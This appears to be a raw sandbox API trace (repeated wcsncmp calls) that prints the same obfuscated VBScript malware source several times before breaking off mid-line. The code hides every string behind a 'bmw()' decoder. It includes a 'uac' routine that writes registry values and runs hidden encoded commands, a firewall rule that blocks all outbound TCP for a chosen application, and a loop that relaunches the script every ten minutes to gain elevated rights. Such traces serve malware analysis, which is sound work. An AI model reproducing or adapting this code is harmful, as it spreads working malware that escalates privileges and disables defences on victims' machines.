bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0223.020] wcsncmp (_String1="tr1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.020] wcsncmp (_String1="r1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.020] wcsncmp (_String1="1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0223.020] wcsncmp (_String1="\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0223.020] wcsncmp (_String1="\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 